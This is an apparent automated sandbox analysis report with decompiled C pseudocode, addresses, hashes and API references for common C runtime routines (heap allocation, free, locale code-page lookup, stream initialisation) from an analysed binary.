0x009042e1
0x009042e7
0x009042ee
0x009042f2
0x009042fb
0x00904300
0x00904309
0x0090430a
0x0090430c
0x0090430e
0x00904333
0x00904333
0x00904337
0x0090435c
0x0090435c
0x00904339
0x0090433b
0x00904340
0x00904343
0x00904346
0x00904348
0x00904372
0x00904399
0x009043a4
0x009043a4
0x009043a7
0x009043bc
0x009043c2
0x009043c2
0x009043c4
0x009043d9
0x009043dc
0x009043e0
0x009043e3
0x00000000
0x00000000
0x00000000
0x00000000
0x009043c6
0x009043cd
0x009043d5
0x009043d7
0x00000000
0x00000000
0x00000000
0x00000000
0x009043d7
0x009043a9
0x009043a9
0x009043a9
0x009043ac
0x00000000
0x009043ae
0x009043af
0x009043b2
0x00000000
0x009043b4
0x009043b4
0x009043b7
0x00000000
0x009043b7
0x009043b2
0x009043ac
0x00000000
0x0090434a
0x0090434a
0x0090434d
0x0090434e
0x0090434e
0x00904354
0x00904356
0x0090435a
0x00000000
0x00000000
0x0090435a
0x00904348
0x00904310
0x00904310
0x00904313
0x00904318
0x0090431a
0x00000000
0x0090431c
0x0090431f
0x00904321
0x00904324
0x00904329
0x0090432b
0x009043e9
0x009043e9
0x009043e9
0x0090431a
0x00904361
0x00904302
0x00904302
0x00904302
0x0090436f
0x00000000

APIs

_Fputc.LIBCPMT ref: 0090434E

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: Fputc
String ID:
API String ID: 3078413507-0
Opcode ID: 1d8786d2e8e65c8edc7963131571e560c03ed251d98943b2700ec6ec6c4afd62
Instruction ID: d87f6bd2f2eed2fd0c9d8255c06bfb151c72ade3c3c8adac5bebdd7f962fa4ae
Opcode Fuzzy Hash: 1d8786d2e8e65c8edc7963131571e560c03ed251d98943b2700ec6ec6c4afd62
Instruction Fuzzy Hash: 643192B190021BEFCF14DFA8C5909EEB7BDBF08314B14616AE601E7680E731E950DB90

Uniqueness

Uniqueness Score: -1.00%

Function 009100EB Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E009100EB(signed int _a4, CHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t11;
				_Unknown_base(*)()* _t14;
				signed int* _t20;
				signed int _t22;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				_Unknown_base(*)()* _t36;

				_t20 = 0x959c20 + _a4 * 4;
				_t28 =  *0x92c014; // 0xb29a853a
				_t31 = _t30 | 0xffffffff;
				_t29 = _t28 ^  *_t20;
				_t22 = _t28 & 0x0000001f;
				asm("ror edx, cl");
				if(_t29 != _t31) {
					if(_t29 == 0) {
						_t11 = E00910024(_t22, _a12, _a16); // executed
						if(_t11 == 0) {
							L7:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t31 ^  *0x92c014;
							_t14 = 0;
							L8:
							return _t14;
						}
						_t36 = GetProcAddress(_t11, _a8);
						if(_t36 == 0) {
							goto L7;
						}
						 *_t20 = E0090C358(_t36);
						_t14 = _t36;
						goto L8;
					}
					return _t29;
				}
				return 0;
			}

0x009100f5
0x009100ff
0x00910105
0x0091010a
0x0091010c
0x0091010f
0x00910113
0x0091011b
0x00910128
0x00910131
0x00910150
0x00910155
0x0091015d
0x00910165
0x00910167
0x00910169
0x00000000
0x00910169
0x0091013d
0x00910141
0x00000000
0x00000000
0x0091014a
0x0091014c
0x00000000
0x0091014c
0x00000000
0x0091011d
0x00000000

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47587354257195f96265e0fd8e21ad513b92b0221bbd56511dd6dd74c847e878
Instruction ID: 2d05a9c0efebd87c95577a927c0bd36b28cf305f250f81d5dd73c6195fc14271
Opcode Fuzzy Hash: 47587354257195f96265e0fd8e21ad513b92b0221bbd56511dd6dd74c847e878
Instruction Fuzzy Hash: 1F012D33718219AF9F26CEA9EC40ADA33DAABC53707148121FA05CB194DAB5D8C1D751

Uniqueness

Uniqueness Score: -1.00%

Function 009171BC Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E009171BC(void* __edi, void* __eflags) {
				intOrPtr _v12;
				char _t17;
				void* _t18;
				intOrPtr* _t32;
				char _t35;
				void* _t37;

				_push(_t27);
				_t17 = E00910679(0x40, 0x38); // executed
				_t35 = _t17;
				_v12 = _t35;
				if(_t35 != 0) {
					_t2 = _t35 + 0xe00; // 0xe00
					_t18 = _t2;
					__eflags = _t35 - _t18;
					if(__eflags != 0) {
						_t3 = _t35 + 0x20; // 0x20
						_t32 = _t3;
						_t37 = _t18;
						do {
							_t4 = _t32 - 0x20; // 0x0
							E009103F8(__eflags, _t4, 0xfa0, 0);
							 *(_t32 - 8) =  *(_t32 - 8) | 0xffffffff;
							 *(_t32 + 0xd) =  *(_t32 + 0xd) & 0x000000f8;
							 *_t32 = 0;
							_t32 = _t32 + 0x38;
							 *((intOrPtr*)(_t32 - 0x34)) = 0;
							 *((intOrPtr*)(_t32 - 0x30)) = 0xa0a0000;
							 *((char*)(_t32 - 0x2c)) = 0xa;
							 *((intOrPtr*)(_t32 - 0x2a)) = 0;
							 *((char*)(_t32 - 0x26)) = 0;
							__eflags = _t32 - 0x20 - _t37;
						} while (__eflags != 0);
						_t35 = _v12;
					}
				} else {
					_t35 = 0;
				}
				E0090F884(0);
				return _t35;
			}

0x009171c2
0x009171c9
0x009171ce
0x009171d2
0x009171d9
0x009171df
0x009171df
0x009171e5
0x009171e7
0x009171ea
0x009171ea
0x009171ed
0x009171ef
0x009171f5
0x009171f9
0x009171fe
0x00917202
0x00917206
0x00917208
0x0091720b
0x00917211
0x00917218
0x0091721c
0x0091721f
0x00917222
0x00917222
0x00917226
0x00917229
0x009171db
0x009171db
0x009171db
0x0091722b
0x00917236

APIs

Part of subcall function 00910679: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0090FD9E,00000001,00000364,00000002,000000FF,?,?,00905E75,?), ref: 009106BA

_free.LIBCMT ref: 0091722B

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 491ededa7c4b3c7658d65f7eea720b0905731b5ddf37ddb40e3728c8a3dede08
Instruction ID: 715af2ef6374647cb5b3ff8929439343d5a5f2765ffbab431ddd454d0d6d892d
Opcode Fuzzy Hash: 491ededa7c4b3c7658d65f7eea720b0905731b5ddf37ddb40e3728c8a3dede08
Instruction Fuzzy Hash: AA01DB7370831B6BC3218F94D8859D9FBACFB453B0F144629E955A75C0E770AD51C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0090CEE2 Relevance: 1.5, APIs: 1, Instructions: 44
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E0090CEE2(void* __ebx, intOrPtr* __ecx, void* __eflags) {
				void* _v5;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t16;
				void* _t17;
				char _t23;
				void* _t27;
				intOrPtr* _t32;
				intOrPtr _t33;

				_t32 = __ecx;
				_t16 = E00910679(1, 0xb8);
				_t31 =  *_t32;
				_t33 = _t16;
				 *((intOrPtr*)( *_t32)) = _t33;
				_t17 = E0090F884(0);
				_t37 = _t33;
				if(_t33 != 0) {
					_v36 =  *_t32;
					_v32 =  *((intOrPtr*)(_t32 + 4));
					_v28 =  *((intOrPtr*)(_t32 + 8));
					_v24 =  *((intOrPtr*)(_t32 + 0xc));
					_v20 =  *((intOrPtr*)(_t32 + 0x10));
					_t23 = 4;
					_v12 = _t23;
					_v16 = _t23;
					_push( &_v12);
					_push( &_v36);
					_push( &_v16); // executed
					_t27 = E0090CD68(__ebx, _t31, _t32, _t33, _t37); // executed
					return _t27;
				}
				return _t17;
			}

0x0090cef3
0x0090cef5
0x0090cefa
0x0090cefc
0x0090cf00
0x0090cf02
0x0090cf0a
0x0090cf0c
0x0090cf13
0x0090cf19
0x0090cf1f
0x0090cf25
0x0090cf2d
0x0090cf30
0x0090cf31
0x0090cf34
0x0090cf3a
0x0090cf3e
0x0090cf42
0x0090cf43
0x00000000
0x0090cf43
0x0090cf4b

APIs

Part of subcall function 00910679: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0090FD9E,00000001,00000364,00000002,000000FF,?,?,00905E75,?), ref: 009106BA

_free.LIBCMT ref: 0090CF02

Part of subcall function 0090F884: HeapFree.KERNEL32(00000000,00000000,?,00917BB6,?,00000000,?,?,?,00917E59,?,00000007,?,?,0091834C,?), ref: 0090F89A
Part of subcall function 0090F884: GetLastError.KERNEL32(?,?,00917BB6,?,00000000,?,?,?,00917E59,?,00000007,?,?,0091834C,?,?), ref: 0090F8AC

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: Heap$AllocateErrorFreeLast_free
String ID:
API String ID: 314386986-0
Opcode ID: 9e87246d43e688ef2dd5b514f5511ec400d676bad7b12999b453851cd03663ad
Instruction ID: c7f850630ad40f091f830173c18bb2a6ef75a1f5e25fb1325ca74c9bb10218d2
Opcode Fuzzy Hash: 9e87246d43e688ef2dd5b514f5511ec400d676bad7b12999b453851cd03663ad
Instruction Fuzzy Hash: F401C0B6D00219AFCB10DF95C441BDEBBF8FF48710F104266E914E7280E775A655CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00910679 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00910679(signed int _a4, signed int _a8) {
				void* _t8;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x959fbc, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E0090E490();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00909B5C(__eflags))) = 0xc;
							__eflags = 0;
							return 0;
						}
						__eflags = E0090E4DB(__eflags, _t19);
						if(__eflags == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x0091067f
0x00910684
0x00910692
0x00910692
0x00910698
0x0091069a
0x0091069a
0x009106b1
0x009106ba
0x009106c2
0x00000000
0x00000000
0x009106a2
0x009106a4
0x009106c6
0x009106cb
0x009106d1
0x00000000
0x009106d1
0x009106ad
0x009106af
0x00000000
0x00000000
0x009106af
0x00000000
0x009106b1
0x0091068a
0x00910690
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0090FD9E,00000001,00000364,00000002,000000FF,?,?,00905E75,?), ref: 009106BA

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 40f6df50218d96c5a19814d2643f4788b3d7f89562f8e5453da4c69f6b6ab7ca
Instruction ID: 8fef78c00dcc6e1f83ca9b609ada968b01f7f09ecacd8109b8ab5b532f2d6e06
Opcode Fuzzy Hash: 40f6df50218d96c5a19814d2643f4788b3d7f89562f8e5453da4c69f6b6ab7ca
Instruction Fuzzy Hash: 76F0BB31705629AFDB215A269C017DB374D9BC07E0B148621B814EA191CAA2DCE146E4

Uniqueness

Uniqueness Score: -1.00%

Function 00911A62 Relevance: 1.5, APIs: 1, Instructions: 36
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 76%

			E00911A62(void* __eflags, intOrPtr* _a4) {
				intOrPtr _t11;
				intOrPtr _t15;
				intOrPtr* _t22;

				 *0x959a54 =  *0x959a54 + 1;
				_t22 = _a4;
				_t11 = E00910679(0x1000, 1); // executed
				 *((intOrPtr*)(_t22 + 4)) = _t11;
				E0090F884(0);
				if( *((intOrPtr*)(_t22 + 4)) == 0) {
					asm("lock or [eax], ecx");
					 *((intOrPtr*)(_t22 + 4)) = _t22 + 0x14;
					0x1000 = 2;
				} else {
					_push(0x40);
					asm("lock or [eax], ecx");
				}
				 *((intOrPtr*)(_t22 + 0x18)) = 0x1000;
				_t15 =  *((intOrPtr*)(_t22 + 4));
				 *(_t22 + 8) =  *(_t22 + 8) & 0x00000000;
				 *_t22 = _t15;
				return _t15;
			}

0x00911a67
0x00911a6e
0x00911a7a
0x00911a81
0x00911a84
0x00911a93
0x00911aa2
0x00911aaa
0x00911aad
0x00911a95
0x00911a95
0x00911a98
0x00911a98
0x00911aae
0x00911ab1
0x00911ab4
0x00911ab9
0x00911abd

APIs

Part of subcall function 00910679: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0090FD9E,00000001,00000364,00000002,000000FF,?,?,00905E75,?), ref: 009106BA

_free.LIBCMT ref: 00911A84

Part of subcall function 0090F884: HeapFree.KERNEL32(00000000,00000000,?,00917BB6,?,00000000,?,?,?,00917E59,?,00000007,?,?,0091834C,?), ref: 0090F89A
Part of subcall function 0090F884: GetLastError.KERNEL32(?,?,00917BB6,?,00000000,?,?,?,00917E59,?,00000007,?,?,0091834C,?,?), ref: 0090F8AC

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: Heap$AllocateErrorFreeLast_free
String ID:
API String ID: 314386986-0
Opcode ID: dd829282ca0f288c23bc29f56684c54c7f06a279db88475ee022153341c0d856
Instruction ID: 36b606c4bbd6d7715d9edf7a4e4a4c14fd3daa6d43243ffaf46e3f211d1e2093
Opcode Fuzzy Hash: dd829282ca0f288c23bc29f56684c54c7f06a279db88475ee022153341c0d856
Instruction Fuzzy Hash: 43F062726017049FD3359F55D801B96B7E8EF80B11F10842EE79A8B590D7B4A485CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00903940 Relevance: 1.5, APIs: 1, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00903940(intOrPtr* __ecx, void* __esi, void* __eflags) {
				void* _t31;
				void* _t36;
				void* _t37;
				intOrPtr* _t39;
				void* _t40;

				_push(8);
				E0090557D(0x91cc9b, _t31, _t37, __esi);
				_t39 = __ecx;
				 *((intOrPtr*)(_t40 - 0x14)) = __ecx;
				 *((intOrPtr*)(_t40 - 0x10)) = 0;
				if( *((intOrPtr*)(_t40 + 0x10)) != 0) {
					 *__ecx = 0x91d38c;
					 *((intOrPtr*)(__ecx + 0x10)) = 0;
					 *((intOrPtr*)(__ecx + 0x30)) = 0;
					 *((intOrPtr*)(__ecx + 0x34)) = 0;
					 *((intOrPtr*)(__ecx + 0x38)) = 0;
					 *((intOrPtr*)(__ecx + 8)) = 0x91d380;
					 *((intOrPtr*)(_t40 - 4)) = 0;
					 *((intOrPtr*)(_t40 - 0x10)) = 1;
				}
				 *((intOrPtr*)(_t39 +  *((intOrPtr*)( *_t39 + 4)))) = 0x91d388;
				_t16 =  *((intOrPtr*)( *_t39 + 4)) - 8; // -8
				 *((intOrPtr*)( *((intOrPtr*)( *_t39 + 4)) + _t39 - 4)) = _t16;
				E00904297(_t31,  *((intOrPtr*)( *_t39 + 4)) + _t39, _t36, _t37,  *((intOrPtr*)( *_t39 + 4)) + _t39,  *((intOrPtr*)(_t40 + 8)),  *((intOrPtr*)(_t40 + 0xc))); // executed
				return E0090554B(_t39);
			}

0x00903940
0x00903947
0x0090394c
0x0090394e
0x00903953
0x00903959
0x0090395b
0x00903961
0x00903964
0x00903967
0x0090396a
0x0090396d
0x00903974
0x00903977
0x00903977
0x00903989
0x00903995
0x00903998
0x009039a3
0x009039af

APIs

__EH_prolog3.LIBCMT ref: 00903947

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: 709ed290fb402b60d9c66c6031c072164b04cb2c012e62365808270c8f10c08c
Instruction ID: 7c1c0e9bf0e45152a35a63e68ebe7de41b20dd32e1f1ecd222dc204928a38d5a
Opcode Fuzzy Hash: 709ed290fb402b60d9c66c6031c072164b04cb2c012e62365808270c8f10c08c
Instruction Fuzzy Hash: 5A01A2B4A01719CFCB60CF68C540A5ABBF0BF08304B51895DE4999B751D7B1AA81CF80

Uniqueness

Uniqueness Score: -1.00%

Function 0091062B Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0091062B(long _a4) {
				void* _t4;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00909B5C(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x959fbc, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E0090E490();
					if(__eflags == 0) {
						goto L7;
					}
					__eflags = E0090E4DB(__eflags, _t8);
					if(__eflags == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x00910631
0x00910637
0x00910669
0x0091066e
0x00910674
0x00000000
0x00910674
0x0091063b
0x0091063d
0x0091063d
0x00910654
0x0091065d
0x00910665
0x00000000
0x00000000
0x00910645
0x00910647
0x00000000
0x00000000
0x00910650
0x00910652
0x00000000
0x00000000
0x00910652
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00905E75,?,?,?,?,?,00901137,?,?), ref: 0091065D

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 3cd55c2c5d1bd1fcc46964a8aa27839f15ed98bc2790d770bcfe022ec7580e28
Instruction ID: a961787dcc4ae1519fc0078fa3c75a39e8642ac7c109f8daf8d2f1585cd765dd
Opcode Fuzzy Hash: 3cd55c2c5d1bd1fcc46964a8aa27839f15ed98bc2790d770bcfe022ec7580e28
Instruction Fuzzy Hash: 92E0ED3170422A9EEA212A269C04BDB3A4C9BC13F0F114220BC94D60D1CBA2CCE082F4

Uniqueness

Uniqueness Score: -1.00%

Function 00904297 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00904297(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, char _a8) {
				void* __esi;
				void* __ebp;
				short _t11;
				void* _t21;

				_t21 = __ecx;
				E00903EB6(__ebx, __ecx, __edi, __ecx, __eflags);
				_t17 = __ecx;
				 *(__ecx + 0x3c) =  *(__ecx + 0x3c) & 0x00000000;
				 *((intOrPtr*)(__ecx + 0x38)) = _a4;
				_t11 = E0090276E(__ecx, __edx, 0x20); // executed
				 *((short*)(_t21 + 0x40)) = _t11;
				if( *((intOrPtr*)(_t21 + 0x38)) == 0) {
					_t17 = _t21;
					_push(0);
					_t11 = E00901A94(_t21,  *(_t21 + 0xc) | 0x00000004);
				}
				if(_a8 != 0) {
					return E00904E9F(_t17, _t21);
				}
				return _t11;
			}

0x0090429b
0x0090429d
0x009042a5
0x009042a7
0x009042ad
0x009042b0
0x009042b9
0x009042bd
0x009042c2
0x009042c4
0x009042ca
0x009042ca
0x009042d3
0x00000000
0x009042db
0x009042de

APIs

std::ios_base::_Init.LIBCPMT ref: 0090429D

Part of subcall function 00903EB6: __EH_prolog3.LIBCMT ref: 00903EBD
Part of subcall function 00903EB6: std::locale::_Init.LIBCPMT ref: 00903F06

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: Init$H_prolog3std::ios_base::_std::locale::_
String ID:
API String ID: 2854901245-0
Opcode ID: 0fa34c95cab267748510f29aa312ab131bf31450feb27bb3288734d23116ca7b
Instruction ID: f9e4837e84cae224f38ff20e1481b35b4522e4b60f2469d40263e682c14b9716
Opcode Fuzzy Hash: 0fa34c95cab267748510f29aa312ab131bf31450feb27bb3288734d23116ca7b
Instruction Fuzzy Hash: F3F065716007105FDB30A765C549B5B77D8AF40734F00581EF58257AC1DAB5F840C790

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0091935A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E0091935A(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = L"ACP";
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = L"OCP";
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E0090F127(_t23, _t23);
									goto L25;
								}
								if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

0x0091935f
0x00919360
0x00919367
0x0091940b
0x00919424
0x0091942a
0x0091942f
0x00919431
0x00919431
0x00919437
0x0091943a
0x0091943a
0x00919426
0x00919426
0x00000000
0x00919426
0x0091936d
0x00919372
0x00000000
0x00000000
0x00919378
0x0091937d
0x0091937f
0x0091937f
0x00919385
0x00000000
0x00000000
0x0091938a
0x009193a1
0x009193a1
0x009193aa
0x009193ac
0x00000000
0x00000000
0x009193ae
0x009193b3
0x009193b5
0x009193b5
0x009193bb
0x00000000
